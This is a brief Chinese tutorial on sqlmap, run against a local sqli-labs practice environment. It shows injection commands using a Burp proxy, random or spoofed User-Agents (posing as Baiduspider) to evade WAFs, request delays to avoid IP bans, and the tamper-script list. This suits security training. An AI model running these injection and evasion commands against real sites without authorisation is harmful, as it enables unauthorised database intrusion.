环境
- phpstudy
- sqli-labs
本地搭建sqli-labs作为演示
抓取数据包——proxy参数
sqlmap提供了--proxy参数来使用户在进行注入的过程中使用代理
python sqlmap.py -u localhost/sqli-labs/less-2/index.php?id=1 --proxy=127.0.0.1
使用burp即可抓取到sqlmap进行注入时的数据包
使用sqlmap自带的随机的(自定义)UA——random-agent、user-agent
在进行注入时,目标网站使用waf,此方法可以绕过根据特征进行防御网站攻击的waf
python sqlmap.py -u localhost/sqli-labs/less-2/index.php?id=1 --proxy=http://127.0.0.1:8080 --random-agent
可以对比上面UA头部,UA头部发生了改变
也可以在注入时使用自定义的UA
python sqlmap.py -u localhost/sqli-labs/less-2/index.php?id=1 --proxy=http://127.0.0.1:8080 --user-agent="Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
延时注入——delay
如果访问网站过于频繁,那么可能被目标网站封禁IP,暂时无法访问网站,sqlmap提供了delay参数来进行延时注入,其中,1是延迟执行sql注入的秒数
python sqlmap.py -u localhost/sqli-labs/less-2/index.php?id=1 --proxy=http://127.0.0.1:8080 --user-agent="Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" --delay 1
列出所有的tamper脚本——list-tampers
列出所有sqlmap的tamper脚本以及其对应的描述
python sqlmap.py --list-tampers
清除sqlmap缓存
sqlmap缓存存放的位置为:C:\Users\USERNAME\AppData\Local\sqlmap\output\SITE,其中,USERNAME为用户的名字,SITE为被扫描的站点的IP或者域名,可以删除该文件来清除sqlmap在扫描时生成的缓存